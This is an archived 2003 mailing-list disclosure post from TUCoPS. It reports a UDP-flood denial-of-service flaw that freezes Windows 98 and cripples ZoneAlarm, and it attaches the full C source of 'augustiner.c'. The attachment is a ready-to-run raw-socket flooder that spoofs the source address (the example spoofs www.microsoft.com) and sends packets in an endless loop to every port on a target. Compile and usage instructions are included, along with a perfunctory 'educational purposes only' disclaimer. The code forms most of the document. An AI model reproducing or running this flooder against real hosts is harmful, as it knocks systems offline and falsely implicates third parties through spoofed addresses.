Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: bt1001.txt

DoS - affecting _both_ ZA and W98





--Boundary-00=_dtpV/cqCmde5b58
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

[-- Genre  : Denial of Service(DoS)
[-- Name  : augustiner.c
[-- Desc   :  Freezing Windows 98(not SE).
[--           :  DoS'ing Zonealarm

(note: those are seperate incidents. It affects both independantly, not just 
W98 with ZA)

[-- Url       : www.nologin.org



Yo everyone!

_6Mo_hAcK posted a perl script that he said DoS'es Zonealarm. Well my W2K
SP3 + ZA Pro 3.0.081 wasn't affected by his code, but as I coded something 
very similar a while ago, I modifed few lines and ran it against my ZA. 
Indeed sending massive amounts of UDP packets to random destination ports 
severly lags my W2k+ZA, rendering it mostly useless.

Also, the same code affects Win98 (SE apparently not affected?. Tried
that in VMware:)) It completely freezes while packets are being sent at it. As
soon as the flood stops the machine resumes normal operation, without any
obvious remaining negative effects. Note this is NOT related to Zonealarm. 
This is an independant vuln in Win98. That machine didnt have any firewall 
installed. 

While I found that Win98 was affected by flooding it with udp packets, the 
Zonealarm vuln(which is why I originally wrote the code :) was found by 
someone else. 

See attached code for both vulnerabilities.


[-- Greets : Mr. "o" for pointing me at ZA and the vuln!
[--             ace24 for being elite, cool, and a great guy             
[--             thorz for explaining me as much as I could ask years ago  
[--             skape for explaining me as much as I can ask today        
[--             thief for interesting discussions and lots of fun         
[--             ninja405 for providing nologin.org. Thx man!              
[--             ig88 for being the international man of mystery          
[--             westcose for being a great guy                            
[--             Mr. "I bet this was funny in ..." trew for his "humour" :]    
[--             phenoelit.de (especially FtR) for lots of fun             
[--             and a place to crash                                                


warlord
www.nologin.org

--Boundary-00=_dtpV/cqCmde5b58
Content-Type: text/x-csrc;
  charset="us-ascii";
  name="augustiner.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="augustiner.c"

/*
[------------------------------------------------------------------------]
[-- nologin - nologin - nologin -=]   [=- nologin - nologin - nologin  --]
[------------------------------------------------------------------------]
[-- Genre  : Denial of Service(DoS)                                    --]
[-- Name   : augustiner.c                                              --]
[-- Desc   : Udp flooder. Freezing Windows 98(not SE).     	       --]
[--	   :              DoS'ing Zonealarm			       --]
[-- Url    : www.nologin.org                                           --]
[-- Use    : gcc -o augustiner augustiner.c; ./augustiner              --]
[------------------------------------------------------------------------]
[-- Author : |WARL0RD|                                                 --]
[-- Date   : 8/2003                                                    --]
[-- Mod	   : 9/2003						       --]
[------------------------------------------------------------------------]
[-- Comment: Win98 may be out of date, but it's still in widespread    --]
[--          use.                                                      --]
[--          This tool is for educational purposes only of course.     --]
[--          As of today this vuln seems unpatched.                    --]
[--	     Ok after slightly modifying this code it finally has      --]
[--          the intended original effect of DoS'ing Zonealarm.	       --]
[--	     So augustiner.c is 2 DoS in 1. Congrats to Special        --]
[--	     Discount Day.					       --]
[------------------------------------------------------------------------]
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/ip.h>
#include <linux/udp.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <netdb.h>
#include <errno.h>


#define PSEUHDR         sizeof(struct pseudohdr)
#define IP  		struct iphdr
#define UDP 		struct udphdr

extern int errno;


/***********************************************************/
void banner() {
	printf("\n\taugustiner.c\n");
	printf("\tVersion 1.1\n");
	printf("(c) warlord OF nologin.org\n");
	printf("Check www.nologin.org\n");
	printf("-----------------------------------\n");
return;
}

/**********************************************************/

void usage(char *name) {
	printf("Usage: %s <target> <source>\n",name);
	printf("The source address will be spoofed to what you specify\n");
	printf("Example: ./augustiner 192.168.0.1 www.microsoft.com\n");
exit(0);
}



/************************************************************/

unsigned short ipChecksum(unsigned short *ptr, int nbytes)
{
register long sum;
register u_short answer;
u_short oddbyte;
			
sum = 0;
			
while (nbytes > 1)
  {
    sum += *ptr++;
    nbytes -= 2;
  }
											
if (nbytes == 1)
  {
    oddbyte = 0;
    *((u_char *) & oddbyte) = *(u_char *) ptr;
    sum += oddbyte;
  }

sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;

return (answer);
}



/*****************************************************************/




int sendUDP(int sock, char *dhost,char *shost)
{
  unsigned int packetLen, minimalLength;
  unsigned char packet[(packetLen = sizeof(IP) + sizeof(UDP)+100)];
  unsigned short ppp=0;
  IP *iphdr = (IP *)packet;
  UDP *udphdr = (UDP *)((unsigned char *)packet + sizeof(IP));
  struct sockaddr_in s;
  struct hostent *he;
          
          
 srand(time(NULL));
 unsigned char minimalip[(minimalLength = 12 + sizeof(UDP))];
 memset(&s, 0, sizeof(s));
 memset(packet, 0, packetLen);
 memset(minimalip, 0, minimalLength);

 if((he=gethostbyname(shost))==NULL)
   {
     *((unsigned long *)((unsigned char *)minimalip+0)) = inet_addr(shost);
   }
  else
   {
     *((unsigned long*)((unsigned char *)minimalip+0)) = *((char *)he->h_addr);
   }


 if((he=gethostbyname(dhost))==NULL)
   {
     *((unsigned long *)((unsigned char *)minimalip+0)) = inet_addr(dhost);
   }
  else
   {
     *((unsigned long*)((unsigned char *)minimalip+0)) = *((char *)he->h_addr);
   }

 *((unsigned char *)((unsigned char *)minimalip+8)) = 0;
 *((unsigned char *)((unsigned char *)minimalip+9)) = IPPROTO_UDP;
 *((unsigned short *)((unsigned char *)minimalip+10)) = htons(packetLen - sizeof(IP));
 iphdr->version       = 4;
 iphdr->ihl      = 5;
 iphdr->id      = 60000;
 iphdr->frag_off = 0;

// iphdr->frag_off = 2050;

 if ((iphdr->saddr = inet_addr(shost)) == (unsigned long)-1) 
  { 
    if (!(he = gethostbyname(shost))) 
      {
        printf("Couldn't resolve the src host\n"); 
        exit(0); 
      } 
    memcpy(&iphdr->saddr, he->h_addr, sizeof(iphdr->saddr)); 
  }

 if ((iphdr->daddr = inet_addr(dhost)) == (unsigned long)-1) 
  { 
    if (!(he = gethostbyname(dhost))) 
      {
        printf("Couldn't resolve the dst host\n"); 
        exit(0); 
      } 
    memcpy(&iphdr->daddr, he->h_addr, sizeof(iphdr->daddr)); 
  }

 iphdr->protocol       = IPPROTO_UDP;
 iphdr->ttl     = 255;
 iphdr->tot_len     = packetLen;
 iphdr->check     = ipChecksum((u_short *)iphdr, sizeof(IP));
 s.sin_family      = AF_INET;

 if((he=gethostbyname(dhost))==NULL)
   {
     s.sin_addr.s_addr=inet_addr(dhost);
   }
  else
   {
     s.sin_addr=*((struct in_addr *)he->h_addr);
   }

while(1)
  {
    ppp++;
    udphdr->source = htons(20000);
    udphdr->dest =   htons(ppp);
    udphdr->len   = htons(8);
    udphdr->check = 0;
                                
    sendto(sock, packet, packetLen, 0, (struct sockaddr *)&s, sizeof(s));
  }
 return 0;
}
                                                                

/***********************************************************/



int main(int argc, char **argv) {
int sock, optval=1;

	banner();

	if(argc<3) usage(argv[0]);

	sock = socket(AF_INET,SOCK_RAW,IPPROTO_UDP);
	setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&optval,sizeof(optval));

	printf("Flooding %s with udp packets.\n",argv[1]);
	printf("Press Ctrl+C to stop\n");

	sendUDP(sock, argv[1], argv[2]);

	close(sock);

exit(0);
}


           
                 
                        

--Boundary-00=_dtpV/cqCmde5b58--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH